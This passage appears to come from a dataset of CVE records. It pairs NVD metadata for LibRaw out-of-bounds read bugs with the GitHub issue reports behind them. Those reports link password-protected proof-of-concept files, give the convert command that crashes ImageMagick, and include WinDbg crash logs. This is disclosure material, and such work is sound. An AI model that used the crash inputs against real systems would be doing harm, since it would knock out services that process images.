[e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 195] 12 00000038 853efc30 00007ff6 5a871e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80] 13 00000038 853efc70 00007ff6 5a871cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 14 00000038 853efcd0 00007ff6 5a871f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 15 00000038 853efd00 00007ffe bf9b7bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] 16 00000038 853efd30 00007ffe c156ced1 KERNEL32!BaseThreadInitThunk+0x14 17 00000038 853efd60 00000000 00000000 ntdll!RtlUserThreadStart+0x21 **System Configuration** - ImageMagick: Version: ImageMagick-7.0.9-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
LibRaw "get_huffman_diff()" Out-of-bounds read vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/270/comments
4
2020-04-02T12:03:57Z
2020-06-17T13:12:10Z
https://github.com/LibRaw/LibRaw/issues/270
592,578,946
270
4,076
CVE-2020-35532
2022-09-01T18:15:08.870
In LibRaw, an out-of-bounds read vulnerability exists within the "simple_decode_row()" function (libraw\src\x3f\x3f_utils_patched.cpp) which can be triggered via an image with a large row_stride field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/5ab45b085898e379fedc6b113e2e82a890602b1e" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/271" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/5ab45b085898e379fedc6b113e2e82a890602b1e" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/271" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibRaw/LibRaw/issues/271
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description** An out-of-bounds read vulnerability exists within the "simple_decode_row()" function (libraw\src\x3f\x3f_utils_patched.cpp) which can be triggered via an image with a large "row_stride" field. **Steps to Reproduce** (poc archive password= girlelecta): https://drive.google.com/file/d/12pjib7aED6VFvV8jmZup_vmROmnchXSb/view cmd: magick.exe convert poc2.X3F new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\magick.exe convert E:\Workspace\poc2.X3F E:\Workspace\new.png ************* Path validation summary ************** Symbol search path is: srv* Executable search path is: ModLoad: 00007ff6 5a870000 00007ff6 5a882000 magick.exe ModLoad: 00007ffe c1500000 00007ffe c16f0000 ntdll.dll ModLoad: 00007ffe a7680000 00007ffe a76f1000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x1228: page heap enabled with flags 0x3. ModLoad: 00007ffe bf9a0000 00007ffe bfa52000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 00007ffe be510000 00007ffe be7b3000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 00007ffe 81c90000 00007ffe 81f19000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00007ffe 96450000 00007ffe 96619000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00007ffe c0ea0000 00007ffe c1034000 C:\WINDOWS\System32\USER32.dll ModLoad: 00007ffe ade30000 00007ffe ade52000 C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll ModLoad: 00007ffe bf580000 00007ffe bf5a1000 C:\WINDOWS\System32\win32u.dll ModLoad: 00007ffe 92510000 00007ffe 926cb000 C:\WINDOWS\SYSTEM32\ucrtbased.dll ModLoad: 00007ffe c0910000 00007ffe c0936000 C:\WINDOWS\System32\GDI32.dll ModLoad: 00007ffe be7c0000 00007ffe be954000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 00007ffe beab0000 00007ffe beb4e000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 00007ffe beb80000 00007ffe bec7a000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 00007ffe c1280000 00007ffe c1323000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 00007ffe c0bb0000 00007ffe c0c4e000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 00007ffe c0cc0000 00007ffe c0d57000 C:\WINDOWS\System32\sechost.dll ModLoad: 00007ffe c02a0000 00007ffe c03c0000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 00007ffe a9270000 00007ffe a9297000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00007ffe 9a830000 00007ffe 9a94f000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00007ffe a20e0000 00007ffe a2166000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00007ffe 9eea0000 00007ffe 9ef40000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00007ffe a8d20000 00007ffe a8d43000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00007ffe a8a60000 00007ffe a8a8a000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00007ffe 81950000 00007ffe 81c8b000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00007ffe bfa60000 00007ffe c0145000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 00007ffe bf530000 00007ffe bf57a000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 00007ffe c0b00000 00007ffe c0ba9000 C:\WINDOWS\System32\shcore.dll ModLoad: 00007ffe bf5b0000 00007ffe bf8e6000 C:\WINDOWS\System32\combase.dll ModLoad: 00007ffe be490000 00007ffe be510000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 00007ffe c1430000 00007ffe c149f000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 00007ffe bec80000 00007ffe bf3ff000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 00007ffe be470000 00007ffe be48f000 C:\WINDOWS\System32\profapi.dll ModLoad: 00007ffe be400000 00007ffe be44a000 C:\WINDOWS\System32\powrprof.dll ModLoad: 00007ffe be3d0000 00007ffe be3e0000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 00007ffe c1220000 00007ffe c1272000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 00007ffe be3e0000 00007ffe be3f1000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 00007ffe bf510000 00007ffe bf527000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 00007ffe c1040000 00007ffe c1196000 C:\WINDOWS\System32\ole32.dll ModLoad: 00007ffe bd950000 00007ffe bd98a000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe bd990000 00007ffe bda5a000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe c0220000 00007ffe c0228000 C:\WINDOWS\System32\NSI.dll (1228.1894): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffe c15d121c cc int 3 0:000> g ModLoad: 00007ffe c1400000 00007ffe c142e000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffe ba570000 00007ffe ba57f000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffe 8b450000 00007ffe 8b5fb000 E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffe 982d0000 00007ffe 983c6000 C:\WINDOWS\SYSTEM32\MSVCP140D.dll (1228.1894): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!simple_decode_row+0x161: 00007ffe 8b550b71 8b0481 mov eax,dword ptr [rcx+rax*4] ds:0000020f d2200cb0=???????? 0:000> k Child-SP RetAddr Call Site 00 0000001a a29230d0 00007ffe 8b5509fc CORE_DB_libraw_!simple_decode_row+0x161 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1154] 01 0000001a a2923180 00007ffe 8b557d93 CORE_DB_libraw_!simple_decode+0x8c [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1191] 02 0000001a a29231e0 00007ffe 8b557ac1 CORE_DB_libraw_!x3f_load_huffman_not_compressed+0x93 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1424] 03 0000001a a2923220 00007ffe 8b557ecd CORE_DB_libraw_!x3f_load_huffman+0x2b1 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1472] 04 0000001a a2923290 00007ffe 8b557768 CORE_DB_libraw_!x3f_load_image+0x12d [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 1514] 05 0000001a a29232f0 00007ffe 8b558504 CORE_DB_libraw_!x3f_load_data+0x88 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_utils_patched.cpp @ 2059] 06 0000001a a2923330 00007ffe 8b553628 CORE_DB_libraw_!LibRaw::x3f_load_raw+0x64 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\x3f\x3f_parse_process.cpp @ 579] 07 0000001a a2923420 00007ffe 8b55d358 CORE_DB_libraw_!LibRaw::unpack+0xc18 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\decoders\unpack.cpp @ 283] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\IM_MOD_DB_DNG_.dll 08 0000001a a29235e0 00007ffe ba571989 CORE_DB_libraw_!libraw_unpack+0x48 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\libraw\src\libraw_c_api.cpp @ 136] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickCore_.dll 09 0000001a a2923620 00007ffe 81ce83b7 IM_MOD_DB_DNG_!ReadDNGImage+0x479 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\coders\dng.c @ 425] 0a 0000001a a2925730 00007ffe 81ce9af3 CORE_DB_MagickCore_!ReadImage+0x5e7 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 553] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-windows\ImageMagick-7.0.9-16\VisualMagick\bin\CORE_DB_MagickWand_.dll 0b 0000001a a292a950 00007ffe 9648aac3 CORE_DB_MagickCore_!ReadImages+0x393 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickcore\constitute.c @ 927] 0c 0000001a a292ba00 00007ffe 96523fe8 CORE_DB_MagickWand_!ConvertImageCommand+0x1523 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickwand\convert.c @ 606] *** WARNING: Unable to verify checksum for magick.exe 0d 0000001a a292d550 00007ff6 5a8714ea CORE_DB_MagickWand_!MagickCommandGenesis+0x338 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\magickwand\mogrify.c @ 185] 0e 0000001a a292e6c0 00007ff6 5a871693 magick!MagickMain+0x4ea [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 149] 0f 0000001a a292f930 00007ff6 5a871f24 magick!wmain+0x43 [e:\workspace\imagemagick\imagemagick-windows\imagemagick-7.0.9-16\imagemagick\utilities\magick.c @ 195] 10 0000001a a292f970 00007ff6 5a871e37 magick!invoke_main+0x34 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 80] 11 0000001a a292f9b0 00007ff6 5a871cfe magick!__scrt_common_main_seh+0x127 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253] 12 0000001a a292fa10 00007ff6 5a871f39 magick!__scrt_common_main+0xe [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 296] 13 0000001a a292fa40 00007ffe bf9b7bd4 magick!wmainCRTStartup+0x9 [f:\dd\vctools\crt\vcstartup\src\startup\exe_wmain.cpp @ 17] 14 0000001a a292fa70 00007ffe c156ced1 KERNEL32!BaseThreadInitThunk+0x14 15 0000001a a292faa0 00000000 00000000 ntdll!RtlUserThreadStart+0x21 **System Configuration** - ImageMagick: Version: ImageMagick-7.0.9-Q16 https://imagemagick.org License: https://imagemagick.org/script/license.php - Environment (Operating system, version and so on): Distributor ID: Microsoft Windows Description: Windows 10
LibRaw "simple_decode_row()" Out-of-bounds read vulnerability
https://api.github.com/repos/LibRaw/LibRaw/issues/271/comments
3
2020-04-02T12:14:58Z
2020-06-17T12:49:47Z
https://github.com/LibRaw/LibRaw/issues/271
592,585,243
271
4,077
CVE-2020-35533
2022-09-01T18:15:08.920
In LibRaw, an out-of-bounds read vulnerability exists within the "LibRaw::adobe_copy_pixel()" function (libraw\src\decoders\dng.cpp) when reading data from the image file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/a6937d4046a7c4742b683a04c8564605fd9be4fb" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/273" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/a6937d4046a7c4742b683a04c8564605fd9be4fb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/273" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00024.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:-:*:*:*:*:*:*", "matchCriteriaId": "E00F0C8F-11AC-42B2-8D85-27028B41EBF3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "B4B8669B-CE7F-47D2-9111-E7787EAD6E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "8269B02E-558F-4AA5-9EEA-87226A3D1816", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.20.2:*:*:*:*:*:*:*", "matchCriteriaId": "06DBABB8-8921-4E8B-B9E5-FFE6CCE79EB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libraw:libraw:0.21.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "36C296E2-1899-457B-9EB2-916A33E383C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibRaw/LibRaw/issues/273
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
**Description** An out-of-bounds read vulnerability exists within the "LibRaw::adobe_copy_pixel()" function (libraw\src\decoders\dng.cpp) when parsing a crafted DNG file. **Steps to Reproduce** (poc archive password= girlelecta): https://drive.google.com/file/d/1kDMhDwfxoZBa31_vrsA2TfQI45FG8NRW/view cmd: magick.exe convert poc.DNG new.png Upon running this, following crash happens (Note: I enabled page heap on magick.exe): Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\magick.exe convert E:\Workspace\poc.DNG E:\Workspace\new.png ************* Path validation summary ************** Symbol search path is: srv* Executable search path is: ModLoad: 00007ff7 d89d0000 00007ff7 d89e2000 magick.exe ModLoad: 00007ffe c1500000 00007ffe c16f0000 ntdll.dll ModLoad: 00007ffe a8430000 00007ffe a84a1000 C:\WINDOWS\System32\verifier.dll Page heap: pid 0x2AA8: page heap enabled with flags 0x3. ModLoad: 00007ffe bf9a0000 00007ffe bfa52000 C:\WINDOWS\System32\KERNEL32.DLL ModLoad: 00007ffe be510000 00007ffe be7b3000 C:\WINDOWS\System32\KERNELBASE.dll ModLoad: 00007ffe a87f0000 00007ffe a8812000 C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll ModLoad: 00007ffe 8b440000 00007ffe 8b5fb000 C:\WINDOWS\SYSTEM32\ucrtbased.dll ModLoad: 00007ffe 800e0000 00007ffe 80374000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickCore_.dll ModLoad: 00007ffe c0ea0000 00007ffe c1034000 C:\WINDOWS\System32\USER32.dll ModLoad: 00007ffe bf580000 00007ffe bf5a1000 C:\WINDOWS\System32\win32u.dll ModLoad: 00007ffe c0910000 00007ffe c0936000 C:\WINDOWS\System32\GDI32.dll ModLoad: 00007ffe be7c0000 00007ffe be954000 C:\WINDOWS\System32\gdi32full.dll ModLoad: 00007ffe beab0000 00007ffe beb4e000 C:\WINDOWS\System32\msvcp_win.dll ModLoad: 00007ffe beb80000 00007ffe bec7a000 C:\WINDOWS\System32\ucrtbase.dll ModLoad: 00007ffe c1280000 00007ffe c1323000 C:\WINDOWS\System32\ADVAPI32.dll ModLoad: 00007ffe c0bb0000 00007ffe c0c4e000 C:\WINDOWS\System32\msvcrt.dll ModLoad: 00007ffe 7ff10000 00007ffe 800da000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickWand_.dll ModLoad: 00007ffe c0cc0000 00007ffe c0d57000 C:\WINDOWS\System32\sechost.dll ModLoad: 00007ffe c02a0000 00007ffe c03c0000 C:\WINDOWS\System32\RPCRT4.dll ModLoad: 00007ffe c1430000 00007ffe c149f000 C:\WINDOWS\System32\WS2_32.dll ModLoad: 00007ffe a82a0000 00007ffe a8340000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libxml_.dll ModLoad: 00007ffe a87c0000 00007ffe a87e7000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_bzlib_.dll ModLoad: 00007ffe a8210000 00007ffe a8296000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_lcms_.dll ModLoad: 00007ffe a8400000 00007ffe a8423000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_lqr_.dll ModLoad: 00007ffe a81e0000 00007ffe a820a000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 0000015b 7f580000 0000015b 7f5aa000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_zlib_.dll ModLoad: 00007ffe 9a830000 00007ffe 9a94f000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_freetype_.dll ModLoad: 00007ffe 7f540000 00007ffe 7f87b000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_glib_.dll ModLoad: 00007ffe bfa60000 00007ffe c0145000 C:\WINDOWS\System32\SHELL32.dll ModLoad: 00007ffe bf530000 00007ffe bf57a000 C:\WINDOWS\System32\cfgmgr32.dll ModLoad: 00007ffe c0b00000 00007ffe c0ba9000 C:\WINDOWS\System32\shcore.dll ModLoad: 00007ffe bf5b0000 00007ffe bf8e6000 C:\WINDOWS\System32\combase.dll ModLoad: 00007ffe be490000 00007ffe be510000 C:\WINDOWS\System32\bcryptPrimitives.dll ModLoad: 00007ffe bec80000 00007ffe bf3ff000 C:\WINDOWS\System32\windows.storage.dll ModLoad: 00007ffe be470000 00007ffe be48f000 C:\WINDOWS\System32\profapi.dll ModLoad: 00007ffe be400000 00007ffe be44a000 C:\WINDOWS\System32\powrprof.dll ModLoad: 00007ffe be3d0000 00007ffe be3e0000 C:\WINDOWS\System32\UMPDC.dll ModLoad: 00007ffe c1220000 00007ffe c1272000 C:\WINDOWS\System32\shlwapi.dll ModLoad: 00007ffe be3e0000 00007ffe be3f1000 C:\WINDOWS\System32\kernel.appcore.dll ModLoad: 00007ffe bf510000 00007ffe bf527000 C:\WINDOWS\System32\cryptsp.dll ModLoad: 00007ffe c1040000 00007ffe c1196000 C:\WINDOWS\System32\ole32.dll ModLoad: 00007ffe bd950000 00007ffe bd98a000 C:\WINDOWS\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe bd990000 00007ffe bda5a000 C:\WINDOWS\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe c0220000 00007ffe c0228000 C:\WINDOWS\System32\NSI.dll (2aa8.3a0): Break instruction exception - code 80000003 (first chance) ntdll!LdrpDoDebuggerBreak+0x30: 00007ffe c15d121c cc int 3 0:000> g ModLoad: 00007ffe c1400000 00007ffe c142e000 C:\WINDOWS\System32\IMM32.DLL ModLoad: 00007ffe b9cb0000 00007ffe b9cbf000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll ModLoad: 00007ffe 7f390000 00007ffe 7f53b000 E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll ModLoad: 00007ffe 982d0000 00007ffe 983c6000 C:\WINDOWS\SYSTEM32\MSVCP140D.dll (2aa8.3a0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_libraw_.dll CORE_DB_libraw_!LibRaw::adobe_copy_pixel+0x95: 00007ffe 7f39dd25 0fb700 movzx eax,word ptr [rax] ds:0000015b 0b76e000=???? 0:000> k Child-SP RetAddr Call Site 00 0000003f 23be2e20 00007ffe 7f3c30e9 CORE_DB_libraw_!LibRaw::adobe_copy_pixel+0x95 [e:\workspace\imagemagick\imagemagick-7.0.10-7\libraw\src\decoders\dng.cpp @ 36] 01 0000003f 23be2e40 00007ffe 7f493628 CORE_DB_libraw_!LibRaw::lossless_dng_load_raw+0x569 [e:\workspace\imagemagick\imagemagick-7.0.10-7\libraw\src\decoders\dng.cpp @ 110] 02 0000003f 23be31b0 00007ffe 7f49d358 CORE_DB_libraw_!LibRaw::unpack+0xc18 [e:\workspace\imagemagick\imagemagick-7.0.10-7\libraw\src\decoders\unpack.cpp @ 283] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\IM_MOD_DB_DNG_.dll 03 0000003f 23be3370 00007ffe b9cb1989 CORE_DB_libraw_!libraw_unpack+0x48 [e:\workspace\imagemagick\imagemagick-7.0.10-7\libraw\src\libraw_c_api.cpp @ 136] *** WARNING: Unable to verify checksum for E:\Workspace\imageMagick\ImageMagick-7.0.10-7\VisualMagick\bin\CORE_DB_MagickCore_.dll 04 0000003f 23be33b0 00007ffe 8013b667 IM_MOD_DB_DNG_!ReadDNGImage+0x479 [e:\workspace\imagemagick\imagemagick-7.0.10-7\imagemagick\coders\dng.c @ 408] 05 0000003f 23be54c0 00007ffe 8013cde3 CORE_DB_MagickCore_!ReadImage+0x5e7 